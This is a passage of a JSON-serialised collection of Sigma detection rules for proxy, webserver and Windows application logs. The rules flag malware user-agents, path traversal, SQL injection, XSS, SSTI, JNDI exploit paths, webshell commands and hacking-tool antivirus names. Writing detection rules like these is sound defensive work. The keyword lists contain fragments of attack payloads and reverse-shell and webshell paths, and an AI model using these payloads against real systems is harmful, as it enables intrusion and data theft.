https://unit42.paloaltonetworks.com/thor-plugx-variant/\n            - 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/\n            - 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg\n            - 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update\n            - 'antSword/v2.1' # AntSword Webshell UA\n            - 'rqwrwqrqwrqw'  # Racoon Stealer\n            - 'qwrqrwrqwrqwr'  # Racoon Stealer\n            - 'rc2.0/client'  # Racoon Stealer\n            - 'TakeMyPainBack'  # Racoon Stealer\n            - 'xxx' # Racoon Stealer\n            - '20112211' # Racoon Stealer\n            - '23591' # Racoon Stealer\n            - '901785252112' # Racoon Stealer\n            - '1235125521512' # Racoon Stealer\n            - '125122112551' # Racoon Stealer\n            - 'B1D3N_RIM_MY_ASS' # Racoon Stealer\n            - 'AYAYAYAY1337' # Racoon Stealer\n            - 'iMightJustPayMySelfForAFeature' # Racoon Stealer\n            - 'ForAFeature' # Racoon Stealer\n            - 'Ares_ldr_v_*' # AresLoader\n            # - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader\n            - 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db\n            - 'CLCTR' # https://github.com/silence-is-best/c2db\n            - 'uploader' # https://github.com/silence-is-best/c2db\n            - 'agent' # https://github.com/silence-is-best/c2db\n            - 'License' # https://github.com/silence-is-best/c2db\n            - 'vb wininet' # https://github.com/silence-is-best/c2db\n            - 'Client' # https://github.com/silence-is-best/c2db\n            - 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880\n            - 'svc/1.0' # SVC Loader - https://twitter.com/suyog41/status/1558051450797690880\n            - 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880\n            - 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880\n            - 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880\n            - 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880\n            - 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880\n            - 'DuckTales' # Racoon Stealer\n            - 'Zadanie' # Racoon Stealer\n            - 'GunnaWunnaBlueTips' # Racoon Stealer\n            - 'Xlmst' # Racoon Stealer\n            - 'GeekingToTheMoon' # Racoon Stealer\n            - 'SunShineMoonLight' # Racoon Stealer\n            - 'BunnyRequester' # BunnyStealer\n            - 'BunnyTasks' # BunnyStealer\n            - 'BunnyStealer' # BunnyStealer\n            - 'BunnyLoader_Dropper' # BunnyStealer\n            - 'BunnyLoader' # BunnyStealer\n            - 'BunnyShell' # BunnyStealer\n            - 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/\n            - '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301\n            - 'SouthSide' # Racoon Stealer\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_powershell.yml",
    "content": "title: Windows PowerShell User Agent\nid: c8557060-9221-4448-8794-96320e6f3e74\nstatus: test\ndescription: Detects Windows PowerShell Web Access\nreferences:\n    - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|contains: ' WindowsPowerShell/'\n    condition: selection\nfalsepositives:\n    - Administrative scripts that download files from the Internet\n    - Administrative scripts that retrieve certain website contents\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_rclone.yml",
    "content": "title: Rclone Activity via Proxy\nid: 2c03648b-e081-41a5-b9fb-7d854a915091\nstatus: test\ndescription: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string\nreferences:\n    - https://rclone.org/\n    - https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone\nauthor: Janantha Marasinghe\ndate: 2022-10-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'rclone/v'\n    condition: selection\nfalsepositives:\n    - Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_susp.yml",
    "content": "title: Suspicious User Agent\nid: 7195a772-4b3f-43a4-a210-6a003d65caa1\nstatus: test\ndescription: Detects suspicious malformed user agent strings in proxy logs\nreferences:\n    - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2022-10-31\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection1:\n        c-useragent|startswith:\n            - 'user-agent'  # User-Agent: User-Agent:\n            - 'Mozilla/3.0 '\n            - 'Mozilla/2.0 '\n            - 'Mozilla/1.0 '\n            - 'Mozilla '  # missing slash\n            - ' Mozilla/'  # leading space\n            - 'Mozila/'  # single 'l'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol'  # https://twitter.com/NtSetDefault/status/1303643299509567488\n    selection2:\n        c-useragent|contains:\n            - ' (compatible;MSIE '  # typical typo - missing space\n            - '.0;Windows NT '  # typical typo - missing space\n            - 'loader'  # https://twitter.com/securityonion/status/1522614635152744453?s=20&t=gHyPTSq5A27EqKwrCd9ohg\n    selection3:\n        c-useragent:\n            - '_'\n            - 'CertUtil URL Agent'  # https://twitter.com/stvemillertime/status/985150675527974912\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)'  # CobaltStrike Beacon https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\n            - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0'  # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html\n            - 'HTTPS'  # https://twitter.com/stvemillertime/status/1204437531632250880\n            - 'Erbium-UA-4ce7c27cb4be9d32e333bf032c88235a'  # https://www.cyfirma.com/outofband/erbium-stealer-malware-report\n            - 'x'  # Use by Racoon Stealer but could be something else\n            - 'xxx'  # Use by Racoon Stealer but could be something else\n    falsepositives:\n        - c-useragent: 'Mozilla/3.0 * Acrobat *'  # Acrobat with linked content\n        - cs-host|endswith: # Adobe product traffic, example: Mozilla/3.0 (compatible; Adobe Synchronizer 10.12.20000)\n              - '.acrobat.com'\n              - '.adobe.com'\n              - '.adobe.io'\n    condition: 1 of selection* and not falsepositives\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_susp_base64.yml",
    "content": "title: Potential Base64 Encoded User-Agent\nid: 894a8613-cf12-48b3-8e57-9085f54aa0c3\nrelated:\n    - id: d443095b-a221-4957-a2c4-cd1756c9b747\n      type: derived\nstatus: test\ndescription: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2022/07/yamabot.html\n    - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nauthor: Florian Roth (Nextron Systems), Brian Ingram (update)\ndate: 2022-07-08\nmodified: 2023-05-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|endswith: '='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_webdav_external_execution.yml",
    "content": "title: Suspicious External WebDAV Execution\nid: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398\nrelated:\n    - id: 4c55738d-72d8-490e-a2db-7969654e375f\n      type: similar\nstatus: test\ndescription: |\n    Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.\nreferences:\n    - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\n    - https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\nauthor: Ahmed Farouk\ndate: 2024-05-10\ntags:\n    - attack.initial-access\n    - attack.resource-development\n    - attack.t1584\n    - attack.t1566\nlogsource:\n    category: proxy\ndetection:\n    selection_webdav:\n        c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'\n        cs-method: 'GET'\n    selection_execution:\n        c-uri|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dat'\n            - '.cmd'\n            - '.exe'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.rar'\n            - '.url'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    filter_main_local_ips:\n        dst_ip|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml",
    "content": "title: F5 BIG-IP iControl Rest API Command Execution - Webserver\nid: 85254a62-22be-4239-b79c-2ec17e566c37\nrelated:\n    - id: b59c98c6-95e8-4d65-93ee-f594dfb96b17\n      type: similar\nstatus: test\ndescription: Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP\nreferences:\n    - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n    - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\n    - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-11-08\ntags:\n    - attack.execution\n    - attack.t1190\n    - attack.initial-access\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|endswith: '/mgmt/tm/util/bash'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the BIG IP REST API to execute command for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml",
    "content": "title: Successful IIS Shortname Fuzzing Scan\nid: 7cb02516-6d95-4ffc-8eee-162075e111ac\nstatus: test\ndescription: When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml\n    - https://www.exploit-db.com/exploits/19525\n    - https://github.com/lijiejie/IIS_shortname_Scanner\nauthor: frack113\ndate: 2021-10-06\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '~1'\n        cs-uri-query|endswith: 'a.aspx'\n        cs-method:\n            - GET\n            - OPTIONS\n        # Success only\n        sc-status:\n            - 200\n            - 301\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_java_payload_in_access_logs.yml",
    "content": "title: Java Payload Strings\nid: 583aa0a2-30b1-4d62-8bf3-ab73689efe6c\nstatus: test\ndescription: Detects possible Java payloads in web access logs\nreferences:\n    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n    - https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/\n    - https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\n    - https://twitter.com/httpvoid0x2f/status/1532924261035384832\n    - https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035\nauthor: frack113, Harjot Singh, \"@cyb3rjy0t\" (update)\ndate: 2022-06-04\nmodified: 2023-01-19\ntags:\n    - cve.2022-26134\n    - cve.2021-26084\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '%24%7B%28%23a%3D%40'\n        - '${(#a=@'\n        - '%24%7B%40java'\n        - '${@java'\n        - 'u0022java'\n        - '%2F%24%7B%23'\n        - '/${#'\n        - 'new+java.'\n        - 'getRuntime().exec('\n        - 'getRuntime%28%29.exec%28'\n    condition: keywords\nfalsepositives:\n    - Legitimate apps\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_jndi_exploit.yml",
    "content": "title: JNDIExploit Pattern\nid: 412d55bc-7737-4d25-9542-5b396867ce55\nstatus: test\ndescription: Detects exploitation attempt using the JNDI-Exploit-Kit\nreferences:\n    - https://github.com/pimps/JNDI-Exploit-Kit\n    - https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-12\nmodified: 2022-12-25\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '/Basic/Command/Base64/'\n        - '/Basic/ReverseShell/'\n        - '/Basic/TomcatMemshell'\n        - '/Basic/JettyMemshell'\n        - '/Basic/WeblogicMemshell'\n        - '/Basic/JBossMemshell'\n        - '/Basic/WebsphereMemshell'\n        - '/Basic/SpringMemshell'\n        - '/Deserialization/URLDNS/'\n        - '/Deserialization/CommonsCollections1/Dnslog/'\n        - '/Deserialization/CommonsCollections2/Command/Base64/'\n        - '/Deserialization/CommonsBeanutils1/ReverseShell/'\n        - '/Deserialization/Jre8u20/TomcatMemshell'\n        - '/TomcatBypass/Dnslog/'\n        - '/TomcatBypass/Command/'\n        - '/TomcatBypass/ReverseShell/'\n        - '/TomcatBypass/TomcatMemshell'\n        - '/TomcatBypass/SpringMemshell'\n        - '/GroovyBypass/Command/'\n        - '/WebsphereBypass/Upload/'\n    condition: keywords\nfalsepositives:\n    - Legitimate apps the use these paths\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml",
    "content": "title: Path Traversal Exploitation Attempts\nid: 7745c2ea-24a5-4290-b680-04359cb84b35\nstatus: test\ndescription: Detects path traversal exploitation attempts\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates\n    - https://book.hacktricks.xyz/pentesting-web/file-inclusion\nauthor: Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-09-25\nmodified: 2023-08-31\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '../../../../../lib/password'\n            - '../../../../windows/'\n            - '../../../etc/'\n            - '..%252f..%252f..%252fetc%252f'\n            - '..%c0%af..%c0%af..%c0%afetc%c0%af'\n            - '%252e%252e%252fetc%252f'\n    condition: selection\nfalsepositives:\n    - Expected to be continuously seen on systems exposed to the Internet\n    - Internal vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_source_code_enumeration.yml",
    "content": "title: Source Code Enumeration Detection by Keyword\nid: 953d460b-f810-420a-97a2-cfca4c98e602\nstatus: test\ndescription: Detects source code enumeration that use GET requests by keyword searches in URL strings\nreferences:\n    - https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html\n    - https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1\nauthor: James Ahearn\ndate: 2019-06-08\nmodified: 2022-10-05\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '.git/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_sql_injection_in_access_logs.yml",
    "content": "title: SQL Injection Strings In URI\nid: 5513deaf-f49a-46c2-a6c8-3f111b5cb453\nstatus: test\ndescription: Detects potential SQL injection attempts via GET requests in access logs.\nreferences:\n    - https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/\n    - https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/\n    - https://brightsec.com/blog/sql-injection-payloads/\n    - https://github.com/payloadbox/sql-injection-payload-list\n    - https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection\nauthor: Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)\ndate: 2020-02-22\nmodified: 2023-09-04\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n    keywords:\n        - '@@version'\n        - '%271%27%3D%271'\n        - '=select '\n        - '=select('\n        - '=select%20'\n        - 'concat_ws('\n        - 'CONCAT(0x'\n        - 'from mysql.innodb_table_stats'\n        - 'from%20mysql.innodb_table_stats'\n        - 'group_concat('\n        - 'information_schema.tables'\n        - 'json_arrayagg('\n        - 'or 1=1#'\n        - 'or%201=1#'\n        - 'order by '\n        - 'order%20by%20'\n        - 'select * '\n        - 'select database()'\n        - 'select version()'\n        - 'select%20*%20'\n        - 'select%20database()'\n        - 'select%20version()'\n        - 'select%28sleep%2810%29'\n        - 'SELECTCHAR('\n        - 'table_schema'\n        - 'UNION ALL SELECT'\n        - 'UNION SELECT'\n        - 'UNION%20ALL%20SELECT'\n        - 'UNION%20SELECT'\n        - \"'1'='1\"\n    filter_main_status:\n        sc-status: 404\n    condition: selection and keywords and not 1 of filter_main_*\nfalsepositives:\n    - Java scripts and CSS Files\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_ssti_in_access_logs.yml",
    "content": "title: Server Side Template Injection Strings\nid: ada3bc4f-f0fd-42b9-ba91-e105e8af7342\nstatus: test\ndescription: Detects SSTI attempts sent via GET requests in access logs\nreferences:\n    - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection\n    - https://github.com/payloadbox/ssti-payloads\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-14\ntags:\n    - attack.defense-evasion\n    - attack.t1221\nlogsource:\n    category: webserver\ndetection:\n    select_method:\n        cs-method: 'GET'\n    keywords:\n        - '={{'\n        - '=%7B%7B'\n        - '=${'\n        - '=$%7B'\n        - '=<%='\n        - '=%3C%25='\n        - '=@('\n        - 'freemarker.template.utility.Execute'\n        - .getClass().forName('javax.script.ScriptEngineManager')\n        - 'T(org.apache.commons.io.IOUtils)'\n    filter:\n        sc-status: 404\n    condition: select_method and keywords and not filter\nfalsepositives:\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_susp_useragents.yml",
    "content": "title: Suspicious User-Agents Related To Recon Tools\nid: 19aa4f58-94ca-45ff-bc34-92e533c0994a\nstatus: test\ndescription: Detects known suspicious (default) user-agents related to scanning/recon tools\nreferences:\n    - https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb\n    - https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst\n    - https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92\nauthor: Nasreddine Bencherchali (Nextron Systems), Tim Shelton\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-user-agent|contains:\n            # Add more tools as you see fit\n            - 'Wfuzz/'\n            - 'WPScan v'\n            - 'Recon-ng/v'\n            - 'GIS - AppSec Team - Project Vision'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_susp_windows_path_uri.yml",
    "content": "title: Suspicious Windows Strings In URI\nid: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e\nstatus: test\ndescription: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '=C:/Users'\n            - '=C:/Program%20Files'\n            - '=C:/Windows'\n            - '=C%3A%5CUsers'\n            - '=C%3A%5CProgram%20Files'\n            - '=C%3A%5CWindows'\n    condition: selection\nfalsepositives:\n    - Legitimate application and websites that use windows paths in their URL\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_webshell_regeorg.yml",
    "content": "title: Webshell ReGeorg Detection Via Web Logs\nid: 2ea44a60-cfda-11ea-87d0-0242ac130003\nstatus: test\ndescription: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.\nreferences:\n    - https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3\n    - https://github.com/sensepost/reGeorg\nauthor: Cian Heasley\ndate: 2020-08-04\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - 'cmd=read'\n            - 'connect&target'\n            - 'cmd=connect'\n            - 'cmd=disconnect'\n            - 'cmd=forward'\n    filter:\n        cs-referer: null\n        cs-user-agent: null\n        cs-method: POST\n    condition: selection and filter\nfalsepositives:\n    - Web applications that use the same URL parameters as ReGeorg\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_win_webshells_in_access_logs.yml",
    "content": "title: Windows Webshell Strings\nid: 7ff9db12-1b94-4a79-ba68-a2402c5d6729\nstatus: test\ndescription: Detects common commands used in Windows webshells\nreferences:\n    - https://bad-jubies.github.io/RCE-NOW-WHAT/\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-02-19\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection_method:\n        cs-method: 'GET'\n    selection_keywords:\n        # The \"%20\" is URL encoded version of the space\n        # The \"%2B\" is URL encoded version of the \"+\"\n        - '=whoami'\n        - '=net%20user'\n        - '=net+user'\n        - '=net%2Buser'\n        - '=cmd%20/c%'\n        - '=cmd+/c+'\n        - '=cmd%2B/c%'\n        - '=cmd%20/r%'\n        - '=cmd+/r+'\n        - '=cmd%2B/r%'\n        - '=cmd%20/k%'\n        - '=cmd+/k+'\n        - '=cmd%2B/k%'\n        - '=powershell%'\n        - '=powershell+'\n        - '=tasklist%'\n        - '=tasklist+'\n        - '=wmic%'\n        - '=wmic+'\n        - '=ssh%'\n        - '=ssh+'\n        - '=python%'\n        - '=python+'\n        - '=python3%'\n        - '=python3+'\n        - '=ipconfig'\n        - '=wget%'\n        - '=wget+'\n        - '=curl%'\n        - '=curl+'\n        - '=certutil'\n        - '=copy%20%5C%5C'\n        - '=dsquery%'\n        - '=dsquery+'\n        - '=nltest%'\n        - '=nltest+'\n    condition: all of selection_*\nfalsepositives:\n    - Web sites like wikis with articles on os commands and pages that include the os commands in the URLs\n    - User searches in search boxes of the respective website\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_xss_in_access_logs.yml",
    "content": "title: Cross Site Scripting Strings\nid: 65354b83-a2ea-4ea6-8414-3ab38be0d409\nstatus: test\ndescription: Detects XSS attempts injected via GET requests in access logs\nreferences:\n    - https://github.com/payloadbox/xss-payload-list\n    - https://portswigger.net/web-security/cross-site-scripting/contexts\nauthor: Saw Win Naung, Nasreddine Bencherchali\ndate: 2021-08-15\nmodified: 2022-06-14\ntags:\n    - attack.initial-access\n    - attack.t1189\nlogsource:\n    category: webserver\ndetection:\n    select_method:\n        cs-method: 'GET'\n    keywords:\n        - '=<script>'\n        - '=%3Cscript%3E'\n        - '=%253Cscript%253E'\n        - '<iframe '\n        - '%3Ciframe '\n        - '<svg '\n        - '%3Csvg '\n        - 'document.cookie'\n        - 'document.domain'\n        - ' onerror='\n        - ' onresize='\n        - ' onload=\"'\n        - 'onmouseover='\n        - '${alert'\n        - 'javascript:alert'\n        - 'javascript%3Aalert'\n    filter:\n        sc-status: 404\n    condition: select_method and keywords and not filter\nfalsepositives:\n    - JavaScripts,CSS Files and PNG files\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/Other/win_av_relevant_match.yml",
    "content": "title: Relevant Anti-Virus Signature Keywords In Application Log\nid: 78bc5783-81d9-4d73-ac97-59f6db4f72a8\nstatus: test\ndescription: |\n    Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.\nreferences:\n    - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\n    - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\n    - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2017-02-19\nmodified: 2024-12-25\ntags:\n    - attack.resource-development\n    - attack.t1588\nlogsource:\n    product: windows\n    service: application\ndetection:\n    keywords:\n        - 'Adfind'\n        - 'ASP/BackDoor '\n        - 'ATK/'\n        - 'Backdoor.ASP'\n        - 'Backdoor.Cobalt'\n        - 'Backdoor.JSP'\n        - 'Backdoor.PHP'\n        - 'Blackworm'\n        - 'Brutel'\n        - 'BruteR'\n        - 'Chopper'\n        - 'Cobalt'\n        - 'COBEACON'\n        - 'Cometer'\n        - 'CRYPTES'\n        - 'Cryptor'\n        - 'Destructor'\n        - 'DumpCreds'\n        - 'Exploit.Script.CVE'\n        - 'FastReverseProxy'\n        - 'Filecoder'\n        - 'GrandCrab '\n        - 'HackTool'\n        - 'HKTL'\n        - 'HTool-'\n        - '/HTool'\n        - '.HTool'\n        - 'IISExchgSpawnCMD'\n        - 'Impacket'\n        - 'JSP/BackDoor '\n        - 'Keylogger'\n        - 'Koadic'\n        - 'Krypt'\n        - 'Lazagne'\n        - 'Metasploit'\n        - 'Meterpreter'\n        - 'MeteTool'\n        - 'mikatz'\n        - 'Mimikatz'\n        - 'Mpreter'\n        - 'MsfShell'\n        - 'Nighthawk'\n        - 'Packed.Generic.347'\n        - 'PentestPowerShell'\n        - 'Phobos'\n        - 'PHP/BackDoor '\n        - 'Potato'\n        - 'PowerSploit'\n        - 'PowerSSH'\n        - 'PshlSpy'\n        - 'PSWTool'\n        - 'PWCrack'\n        - 'PWDump'\n        - 'Ransom'\n        - 'Rozena'\n        - 'Ryzerlo'\n        - 'Sbelt'\n        - 'Seatbelt'\n        - 'SecurityTool '\n        - 'SharpDump'\n        - 'Shellcode'\n        - 'Sliver'\n        - 'Splinter'\n        - 'Swrort'\n        - 'Tescrypt'\n        - 'TeslaCrypt'\n        - 'TurtleLoader'\n        - 'Valyria'\n        - 'Webshell'\n        # - 'FRP.'\n        # - 'Locker'\n        # - 'PWS.'\n        # - 'PWSX'\n        # - 'Razy'\n        # - 'Ryuk'\n    filter_optional_generic:\n        - 'anti_ransomware_service.exe'\n        - 'Anti-Ransomware'\n        - 'Crack'\n        - 'cyber-protect-service.exe'\n        - 'encryptor'\n        - 'Keygen'\n    filter_optional_information:\n        Level: 4  # Information level\n    filter_optional_restartmanager:\n        Provider_Name: 'Microsoft-Windows-RestartManager'\n    condition: keywords and not 1 of filter_optional_*\nfalsepositives:\n    - Some software piracy tools (key generators, cracks) are classified as hack tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/application_error/win_application_error_lsass_crash.yml",
